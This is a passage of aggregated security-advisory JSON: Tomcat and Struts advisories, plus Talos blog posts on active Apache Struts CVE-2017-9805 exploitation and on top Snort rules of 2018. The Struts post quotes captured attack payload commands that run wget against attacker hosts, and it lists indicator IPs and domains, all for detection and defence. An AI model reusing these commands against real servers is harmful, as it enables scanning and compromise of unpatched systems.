thereby access and/or modify information associated with another web application. (CVE-2017-5648)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-July/022511.html\n\n**Affected packages:**\ntomcat\ntomcat-admin-webapps\ntomcat-docs-webapp\ntomcat-el-2.2-api\ntomcat-javadoc\ntomcat-jsp-2.2-api\ntomcat-jsvc\ntomcat-lib\ntomcat-servlet-3.0-api\ntomcat-webapps\n\n**Upstream details at:**\n", "modified": "2017-07-27T15:49:22", "published": "2017-07-27T15:49:22", "href": "http://lists.centos.org/pipermail/centos-announce/2017-July/022511.html", "id": "CESA-2017:1809", "title": "tomcat security update", "type": "centos", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "talosblog": [{"lastseen": "2017-09-08T17:15:47", "bulletinFamily": "blog", "description": "<i>This post authored by <a href=\"https://twitter.com/infosec_nick\">Nick Biasini</a> with contributions from <a href=\"https://twitter.com/nschmx\">Alex Chiu</a>.</i><br /><br />Earlier this week, a critical vulnerability in <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">Apache Struts</a> was publicly disclosed in a security advisory. This new vulnerability, identified as CVE-2017-9805, manifests due to the way the REST plugin uses XStreamHandler with an instance of XStream for deserialization without any type filtering. As a result, a remote, unauthenticated attacker could achieve remote code execution on a host running a vulnerable version of Apache Struts.<br /><br />This isn't the only vulnerability that has been recently identified in Apache Struts. <a href=\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\">Earlier this year</a>, Talos responded to a zero-day vulnerability that was under active exploitation in the wild. Talos has observed exploitation activity targeting CVE-2017-9805 in a way that is similar to how CVE-2017-5638 was exploited back in March 2017.<br /><br /><a name='more'></a><br /><h3 id=\"h.yjfcx7oxvccx\">Details</h3>Immediately after the reports surfaced related to this exploit, Talos began researching how it operated and began work to develop coverage to prevent successful exploitation. This was achieved and we immediately began seeing active exploitation in the wild. Thus far, exploitation appears to be primarily scanning activity, with outbound requests that appear to be identifying systems that are potentially vulnerable. Below is a sample of the type of HTTP requests we have been observing.<br /><blockquote class=\"tr_bq\"><string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite</string></blockquote>This would initiate a wget request that would write the contents of the HTTP response to /dev/null. This indicates it is purely a scanning activity that identifies to the remote server which websites are potentially vulnerable to this attack. This is also a strong possibility since it includes the compromised website in the URL. There was one other small variation that was conducting a similar request to the same website.<br /><blockquote class=\"tr_bq\"><string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?`echo ...vulnerablesite...`</string></blockquote>During our research we found that the majority of the activity was trying to POST to the path of /struts2-rest-showcase/orders/3. Additionally most of the exploitation attempts are sending the data to wildkind[.]ru, with a decent amount of the requests originating from the IP address associated with wildkind[.]ru, 188.120.246[.]215.<br /><br /><table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"><tbody><tr><td style=\"text-align: center;\"><a href=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s1600/image2.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"><img border=\"0\" data-original-height=\"867\" data-original-width=\"1600\" height=\"346\" src=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s640/image2.png\" width=\"640\" /></a></td></tr><tr><td class=\"tr-caption\" style=\"text-align: center;\">Example of in the wild exploitation</td></tr></tbody></table>Other exploitation attempts have been identified where Talos believes another threat actor appears to be exploiting the vulnerability for a different purpose. An example of the web requests found in the exploitation attempts can be found below.<br /><blockquote class=\"tr_bq\"><string>wget</string><string>hxxp://st2buzgajl.alifuzz[.]com/052</string></blockquote>Unfortunately, we were unable to retrieve the potentially malicious file that was being served at this particular location. If the previous Struts vulnerability is any indicator, the payloads could vary widely and encompass threats such as DDoS bots, spam bots, and various other malicious payloads.<br /><br /><h3 id=\"h.1teoyjf4qh2n\">IOCs</h3>IP Addresses Observed: <br /><ul><li>188.120.246[.]215</li><li>101.37.175[.]165</li><li>162.158.182[.]26</li><li>162.158.111[.]235</li><li>141.101.76[.]226</li><li>141.101.105[.]240</li></ul>Domains Contacted:<br /><ul><li>wildkind[.]ru</li><li>st2buzgajl.alifuzz[.]com</li></ul>Commonly Used Path:<br /><ul><li>/struts2-rest-showcase/orders/3</li></ul><h3 id=\"h.yv6ldyfuky10\">Mitigation</h3>Apache has released a new version of Struts that resolves this issue. If you believe that you have a potentially vulnerable version of Apache struts there are two options: upgrade to Struts 2.5.13 / Struts 2.3.34 or remove the REST plugin if it's not actively being used. Instructions to achieve this are provided as part of the <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">security bulletin</a> and should be reviewed and tested before applying in a production environment. In the event it's not possible to upgrade or remove the REST plugin, limiting it to server normal pages and JSONs may help limit the risk the compromise.<br /><h3 id=\"h.dp04v9qgtelp\">Conclusion</h3>This is the latest in a long line of vulnerabilities that are exposing servers to potential exploitation. In today's threat landscape a lot of attention is paid to endpoint systems being compromised, and with good reason, as it accounts for the majority of the malicious activity we observe on a daily basis. However, that does not imply that patching of servers should not be an extremely high priority. These types of systems, if compromised, can potentially expose critical data and systems to adversaries.<br /><br />The vulnerability is yet another example of how quickly miscreants will move to take advantage of these types of issues. Within 48 hours of disclosure we were seeing systems activity exploiting the vulnerability. To their credit the researchers disclosed the vulnerability responsibly and a patch was available before disclosure occurred. However, with money at stake bad guys worked quickly to reverse engineer the issue and successfully develop exploit code to take advantage of it. In today's reality you no longer have weeks or months to respond to these type of vulnerabilities, it's now down to days or hours and every minute counts. Ensure you have protections in place or patches applied to help prevent your enterprise from being impacted.<br /><h3 id=\"h.myaej86w3pvi\">Coverage</h3>Talos has released the following Snort rule to address this vulnerability. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href=\"https://snort.org/products\">Snort.org</a>.<br /><br />Snort Rule: 44315<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"1341\" data-original-width=\"1600\" height=\"268\" src=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s320/image1.png\" width=\"320\" /></a></div><br /><br />Network Security appliances such as <a href=\"https://www.cisco.com/c/en/us/products/security/firewalls/index.html\">NGFW</a>, <a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\">NGIPS</a>, and <a href=\"https://meraki.cisco.com/products/appliances\">Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=nXfzZg_yH_w:t_cz9fDBuvo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/nXfzZg_yH_w\" height=\"1\" width=\"1\" alt=\"\"/>", "modified": "2017-09-08T15:49:47", "published": "2017-09-07T15:42:00", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nXfzZg_yH_w/apache-struts-being-exploited.html", "id": "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "title": "Another Apache Struts Vulnerability Under Active Exploitation", "type": "talosblog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-12T15:23:07", "bulletinFamily": "blog", "description": "_This blog post was authored by Benny Ketelslegers of Cisco Talos_ \n_ \n_The cybersecurity field shifted quite a bit in 2018. With the boom of cryptocurrency, we saw a transition from ransomware to [cryptocurrency miners](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>). Talos researchers identified APT campaigns including [VPNFilter](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>), predominantly affecting small business and home office networking equipment, as well as [Olympic Destroyer](<https://blog.talosintelligence.com/2018/02/olympic-destroyer.html>), apparently designed to disrupt the Winter Olympics. \n \nBut these headline-generating attacks were only a small part of the day-to-day protection provided by security systems. In this post, we'll review some of the findings created by investigating the most frequently triggered SNORT\u24c7 rules as reported by [Cisco Meraki](<https://meraki.cisco.com/>) systems. These rules protected our customers from some of the most common attacks that, even though they aren't as widely known, could be just as disruptive as something like Olympic Destroyer. Snort is a free, open-source network intrusion prevention system. Cisco Talos provides new rule updates to Snort every week to protect against software vulnerabilities and the latest malware. \n \n \n\n\n### Top 5 Rules\n\n \nSnort rules trigger on network behavior ranging from attempts to probe networked systems, attempts at exploiting systems, to detecting known malicious command and control traffic. Each rules detects specific network activity, and each rules has a unique identifier. This identifier is comprised of three parts. The Generator ID (GID), the rule ID (SID) and revision number. The GID identifies what part of Snort generates the event. For example, \"1\" indicates an event has been generated from the text rules subsystem. The SID uniquely identifies the rule itself. You can search for information on SIDs via the search tool on the [Snort website](<https://www.snort.org/>). The revision number is the version of the rule. Be sure to use the latest revision of any rule. \n \nSnort rules are classified into different classes based on the type of activity detected with the most commonly reported class type being \"policy-violation\" followed by \"trojan-activity\" and \"attempted-admin.\" Some less frequently reported class types such as \"attempted user\" and \"web-application-attack\" are particularly interesting in the context of detecting malicious inbound and outbound network traffic. \n \nCisco Meraki-managed devices protect clients networks and give us an overview of the wider threat environment. These are the five most triggered rules within policy, in reverse order. \n \n\n\n#### No. 5: 1:43687:2 \"suspicious .top dns query\"\n\n \nThe .top top-level domain extension is a generic top level domain and has been observed in malware campaigns such as the [Angler exploit kit](<https://blog.talosintelligence.com/2016/03/angler-slips-hook.html>) and the [Necurs botnet](<https://blog.talosintelligence.com/2018/01/the-many-tentacles-of-necurs-botnet.html>). This top-level domain can be bought as cheap as 1 USD and is the reason it is very popular with cybercriminals for their malware and phishing campaigns. \n \nThis signature triggers on DNS lookups for .top domains. Such a case doesn\u2019t necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. \n \n\n\n#### No. 4: 1:41978:5 \"Microsoft Windows SMB remote code execution attempt\"\n\n \nIn May 2017, a [vulnerability](<https://www.us-cert.gov/ncas/current-activity/2017/03/16/Microsoft-SMBv1-Vulnerability>) in SMBv1 was published that could allow remote attackers to execute arbitrary code via crafted packets. This led to the outbreak of the network worms [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [Nyetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) in 2017. Although it did not make our top five rules in 2017, it seems there was still a lot scanning or attempts to exploit this vulnerability in 2018. This shows the importance of network defenses and patching management programs as often as possible. \n \nOrganizations should ensure that devices running Windows are fully patched. Additionally, they should have SMB ports 139 and 445 blocked from all externally accessible hosts. \n \n\n\n#### No. 3: 1:39867:4 \"Suspicious .tk dns query\"\n\n \nThe .tk top-level domain is owned by the South Pacific territory of Tokelau. The domain registry allows for the registration of domains without payment, which leads to the .tk top level domain being one of the most prolific in terms of the number of domain names registered. However, this free registration leads to .tk domains frequently being abused by attackers. \n \nThis rule triggers on DNS lookups for .tk domains. Such a case doesn't necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. \n \nOther, similar rules detecting DNS lookups to other rarely used top-level domains such as .bit, .pw and .top also made into our list of top 20 most triggered rules. \n \n\n\n#### No. 2: 1:35030:1 & 1:23493:6 \"Win.Trojan.Zeus variant outbound connection\"\n\n \nHistorically, one of the most high-profile pieces of malware is [Zeus/Zbot](<https://talosintelligence.com/zeus_trojan>), a notorious trojan that has been employed by botnet operators around the world to steal banking credentials and other personal data, participate in click-fraud schemes, and likely numerous other criminal enterprises. It is the engine behind notorious botnets such as Kneber, which made headlines worldwide. \n \nIn the beginning of 2018, Talos observed a [Zeus variant](<https://blog.talosintelligence.com/2018/01/cfm-zeus-variant.html>) that was launched using the official website of Ukraine-based accounting software developer Crystal Finance Millennium (CFM). \n \nThis vector is similar to the attack outlined by Talos in the Nyetya and companion MeDoc blog post. Ukrainian authorities and businesses were alerted by local security firm (ISSP) that another accounting software maker had been compromised. CFM's website was being used to distribute malware that was retrieved by malware downloaders attached to messages associated with a concurrent spam campaign. \n \nEver since the source code of Zeus leaked in 2011, we have seen various variants appear such as [Zeus Panda](<https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html>) which poisoned Google Search results in order to spread. \n \n\n\n#### No. 1: 1:46237:1 \"PUA-OTHER Cryptocurrency Miner outbound connection attempt\" & \"1:45549:4 PUA-OTHER XMRig cryptocurrency mining pool connection attempt\"\n\n \nOver the past year, we have seen a seismic shift in the threat landscape with the explosive growth of malicious cryptocurrency mining. Cisco Talos created various rules throughout the year to combat Cryptocurrency mining threats and this rule deployed in early 2018, proved to be the number 1 showing the magnitude of attacks this rule detected and protected against. This threat has spread across the internet like wildfire and is being delivered through multiple vectors including email, web, and active exploitation. It is no surprise that these two combined rules are the most often observed triggered Snort rule in 2018. \n \nCryptocurrency mining can use up a considerable amount of computing power and energy that would otherwise be incredibly valuable to any organization. \n \nFor an overview of all related snort rules and full details of all the methods and technologies Cisco Talos uses to thwart cryptocurrency mining, download the Talos whitepaper [here](<https://www.talosintelligence.com/resources/59>). \n \n\n\n \n\n\n[![](https://2.bp.blogspot.com/-XcaLfnec00Q/XFsp6eXg_rI/AAAAAAAAACI/fxssE2sbuesqNKpMzg1Lbqnod5iU9u4oQCLcBGAs/s640/012419-Snort-Sigs-Blog-outbound-connection-attempt.png)](<https://2.bp.blogspot.com/-XcaLfnec00Q/XFsp6eXg_rI/AAAAAAAAACI/fxssE2sbuesqNKpMzg1Lbqnod5iU9u4oQCLcBGAs/s1600/012419-Snort-Sigs-Blog-outbound-connection-attempt.png>)\n\n \n\n\n### INBOUND and OUTBOUND\n\n \nNetwork traffic can cross an IDS from external to internal (inbound), from the internal to external (outbound) interfaces or depending on the architecture of your environment the traffic can avoid being filtered by a firewall or inspected by an IPS/IDS device; this will generally be your local/internal traffic on the same layer2 environment. An alert may be triggered and logged for any of these scenarios depending on the rulesets in place and the configuration of your sensors. \n \n \nOutbound rules were triggered during 2018 much more frequently than internal, which in turn, were more frequent than inbound with ratios of approximately 6.9 to 1. The profile of the alerts are different for each direction. Inbound alerts are likely to detect traffic that can be attributed to attacks on various server-side applications such as web applications or databases. Outbound alerts are more likely to contain detection of outgoing traffic caused by malware infected endpoints. \n \nLooking at these data sets in more detail gives us the following: \n \n\n\n[![](https://4.bp.blogspot.com/-p8YZlzLMQXE/XFsqAliaQcI/AAAAAAAAACM/XhgffiU6hUYdyd21OCDF_QJAEpBKYYn1gCLcBGAs/s640/012419-Snort-Sigs-Blog-inbound-signature-types.png)](<https://4.bp.blogspot.com/-p8YZlzLMQXE/XFsqAliaQcI/AAAAAAAAACM/XhgffiU6hUYdyd21OCDF_QJAEpBKYYn1gCLcBGAs/s1600/012419-Snort-Sigs-Blog-inbound-signature-types.png>)\n\n \nWhile trojan activity was rule type we saw the most of in 2018, making up 42.5 percent of all alerts, we can now see \"Server-Apache\" taking the lead followed by \"OS-Windows\" as a close second. \n \nThe \"Server-Apache\" class type covers Apache related attacks which in this case consisted mainly of 1:41818 and 1:41819 detecting the Jakarta Multipart parser vulnerability in Apache Struts ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). Later in 2017, a second Apache Struts vulnerability was discovered under CVE-2017-9805, making this rule type the most observed one for 2018 IDS alerts. \n \n\"OS-Windows\" class alerts were mainly triggered by Snort rule 1:41978, which covers the SMBv1 vulnerability exploited by [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [NotPetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) (MS-17-010). \n \nThe \"Browser-plugins\" class type covers attempts to exploit vulnerabilities in browsers that deal with plugins to the browser. (Example: ActiveX). Most activity for 2018 seems to consist of Sid 1:8068 which is amongst others linked to the \"Microsoft Outlook Security Feature Bypass Vulnerability\" (CVE-2017-11774). \n\n\n \n\n\n[](<http://2.bp.blogspot.com/-lKN6ktW9YRg/XF2L_nSsNfI/AAAAAAAAAVw/6G830jVQQA8On0TJLRDs0enzFolMyl-0QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)[![](https://1.bp.blogspot.com/-hrZUBsvx4sw/XF2Py-Y-_-I/AAAAAAAAAWI/TU0EcE5KCNwNtIznDY93Bt6Hjn0WCih4QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png)](<http://1.bp.blogspot.com/-hrZUBsvx4sw/XF2Py-Y-_-I/AAAAAAAAAWI/TU0EcE5KCNwNtIznDY93Bt6Hjn0WCih4QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)\n\n \n \nFor outbound connections, we observed a large shift toward the \"PUA-Other\" class, which is mainly a cryptocurrency miner outbound connection attempt. Cryptomining can take up a large amount of valuable enterprise resources in terms of electricity and CPU power. To see how to block Cryptomining in an enterprise using Cisco Security Products, have a look at our [w](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>)[hitepaper](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>) published in July 2018. \n \nThe most frequently triggered rules within the \"Malware-CNC\" rule class are the Zeus trojan activity rules discussed above. \n\n\n### Conclusion\n\n \n\n\nSnort rules detect potentially malicious network activity. Understanding why particular rules are triggered and how they can protect systems is a key part of network security. Snort rules can detect and block attempts at exploiting vulnerable systems, indicate when a system is under attack, when a system has been compromised, and help keep users safe from interacting with malicious systems. They can also be used to detect reconnaissance and pre-exploitation activity, indicating that an attacker is attempting to identify weaknesses in an organization's security posture. These can be used to indicate when an organization should be in a heightened state of awareness about the activity occurring within their environment and more suspicious of security alerts being generated. \n \nAs the threat environment changes, it is necessary to ensure that the correct rules are in place protecting systems. Usually, this means ensuring that the most recent rule set has been promptly downloaded and installed. As shown in the Apache Struts vulnerability data, the time between a vulnerability being discovered and exploited may be short. \n \nOur most commonly triggered rule in 2018: 1:46237:1 \"PUA-OTHER Cryptocurrency Miner outbound connection attempt\" highlights the necessity of protecting IoT devices from attack. Malware such as Mirai seeks to compromise these systems to use them as part of a botnet to put to use for further malicious behaviour. Network architectures need to take these attacks into consideration and ensure that all networked devices no matter how small are protected. \n \nSecurity teams need to understand their network architectures and understand the significance of rules triggering in their environment. For full understanding of the meaning of triggered detections it is important for the rules to be open source. Knowing what network content caused a rule to trigger tells you about your network and allows you to keep abreast of the threat environment as well as the available protection. \n \nAt Talos, we are proud to maintain a set of open source Snort rules and support the thriving community of researchers contributing to Snort and helping to keep networks secure against attack. We're also proud to contribute to the training and education of network engineers through the Cisco Networking Academy, as well through the release of additional open-source tools and the detailing of attacks on our blog. \n \nYou can [subscribe](<https://www.snort.org/products>) to Talos' newest rule detection functionality for as low as $29 a year with a personal account. Be sure and see our business pricing for Snort as well [here](<https://snort.org/products%23rule_subscriptions>).![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/6rupY-noy3s)", "modified": "2019-02-12T14:15:53", "published": "2019-02-06T08:19:00", "id": "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/6rupY-noy3s/2018-in-snort-signatures.html", "type": "talosblog", "title": "2018 in Snort Rules", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2017-11-22T19:02:20", "bulletinFamily": "unix", "description": "This update for tomcat fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2017-5664: A problem in handling error pages was fixed, to avoid\n potential file overwrites during error page handling. (bsc#1042910).\n - CVE-2017-7674: A CORS Filter issue could lead to client and server side\n cache poisoning (bsc#1053352)\n - CVE-2017-12617: A remote code execution possibility via JSP Upload was\n fixed (bsc#1059554)\n\n\n Non security bugs fixed:\n\n - Fix tomcat-digest classpath error (bsc#977410)\n - Fix packaged /etc/alternatives symlinks for api libs that caused rpm -V\n to report link mismatch (bsc#1019016)\n\n", "modified": "2017-11-22T15:08:02", "published": "2017-11-22T15:08:02", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-11/msg00029.html", "id": "SUSE-SU-2017:3039-1", "type": "suse", "title": "Security update for tomcat (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-13T23:21:09", "bulletinFamily": "unix", "description": "This update for tomcat fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2017-5664: A problem in handling error pages was fixed, to avoid\n potential file overwrites during error page handling. (bsc#1042910).\n - CVE-2017-7674: A CORS Filter issue could lead to client and server side\n cache poisoning (bsc#1053352)\n - CVE-2017-12617: A remote code execution possibility via JSP Upload was\n fixed (bsc#1059554)\n\n\n Non security issues fixed:\n\n - Fix tomcat-digest classpath error (bsc#977410)\n - Read setenv.sh when starting Tomcat with catalina.sh (bsc#1002639)\n - Fix packaged /etc/alternatives symlinks for api libs that caused rpm -V\n to report link mismatch (bsc#1019016)\n\n", "modified": "2017-12-13T21:10:17", "published": "2017-12-13T21:10:17", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00030.html", "id": "SUSE-SU-2017:3279-1", "type": "suse", "title": "Security update for tomcat (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-24T03:11:02", "bulletinFamily": "unix", "description": "This update for tomcat fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2017-5664: A problem in handling error pages was fixed, to avoid\n potential file overwrites during error page handling. (bsc#1042910).\n - CVE-2017-7674: A CORS Filter issue could lead to client and server side\n cache poisoning (bsc#1053352)\n - CVE-2017-12617: A remote code execution possibility via JSP Upload was\n fixed (bsc#1059554)\n\n Non security bugs fixed:\n\n - Fix tomcat-digest classpath error (bsc#977410)\n - Fix packaged /etc/alternatives symlinks for api libs that caused rpm -V\n to report link mismatch (bsc#1019016)\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "modified": "2017-11-24T00:09:51", "published": "2017-11-24T00:09:51", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-11/msg00033.html", "id": "OPENSUSE-SU-2017:3069-1", "type": "suse", "title": "Security update for tomcat (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cisco": [{"lastseen": "2019-05-29T15:32:17", "bulletinFamily": "software", "description": "A vulnerability in the REST plug-in for Apache Struts could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on a targeted system.\n\nThe vulnerability is due to insufficient validation of user-supplied input by the XStream library in the REST plug-in for the affected application. An attacker could submit crafted XML data to the affected system. A successful exploit could allow the attacker to cause a DoS condition on the targeted system.\n\nA vulnerability in the Representational State Transfer (REST) plug-in of Apache Struts could allow an unauthenticated, remote attacker to execute arbitrary code.\n\nThe vulnerability is due to the improper deserialization of XML requests by the REST plug-in with the XStream handler of the affected software. An attacker could exploit this vulnerability by sending crafted XML content to a targeted system. A successful exploit could allow the attacker to execute arbitrary code on the system, which could result in a complete system compromise.\n\nA vulnerability in the URLValidator feature of Apache Struts could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected system.\n\nThe vulnerability is due to insufficient validation of user-supplied input when the affected software uses the URLValidator feature to validate URLs. An attacker could exploit this vulnerability by submitting a crafted URL in a form field of an application utilizing an affected version of Apache Struts. An exploit could trigger a condition in the regular expression (regex) processing by the URLValidator that would consume excessive amounts of CPU resources, resulting in a DoS condition.\n\nOn September 5, 2017, the Apache Software Foundation released security bulletins that disclosed three vulnerabilities in the Apache Struts 2 package. Of these vulnerabilities, the Apache Software Foundation classifies one as Critical Severity, one as Medium Severity, and one as Low Severity. For more information about the vulnerabilities, refer to the Details [\"#details\"] section of this advisory.\n\nMultiple Cisco products incorporate a version of the Apache Struts 2 package that is affected by these vulnerabilities.\n\nThe following Snort rule can be used to detect possible exploitation of this vulnerability: Snort SIDs 44315 and 44327 through 44330.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170907-struts2 [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170907-struts2\"]", "modified": "2017-10-23T20:27:39", "published": "2017-09-07T21:00:00", "id": "CISCO-SA-20170907-STRUTS2", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170907-struts2", "type": "cisco", "title": "Multiple Vulnerabilities in Apache Struts 2 Affecting Cisco Products: September 2017", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:37", "bulletinFamily": "unix", "description": "[0:7.0.69-12]\n- Resolves: rhbz#1441487 CVE-2017-5648 tomcat: Calls to application listeners did not use the appropriate facade object\n- Resolves: rhbz#1441480 CVE-2017-5647 tomcat: Incorrect handling of pipelined requests when send file was used\n- Resolves: rhbz#1459746 CVE-2017-5664 tomcat: Security constrained bypass in error page mechanism", "modified": "2017-07-27T00:00:00", "published": "2017-07-27T00:00:00", "id": "ELSA-2017-1809", "href": "http://linux.oracle.com/errata/ELSA-2017-1809.html", "title": "tomcat security update", "type": "oraclelinux", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}]}

MySQL Enterprise Monitor 3.2.x &lt; 3.2.9.2249 / 3.3.x &lt; 3.3.5.3292 / 3.4.x &lt; 3.4.3.4225 Multiple Vulnerabilities (October 2017 CPU)

Description

MySQL Enterprise Monitor 3.2.x < 3.2.9.2249 / 3.3.x < 3.3.5.3292 / 3.4.x < 3.4.3.4225 Multiple Vulnerabilities (October 2017 CPU)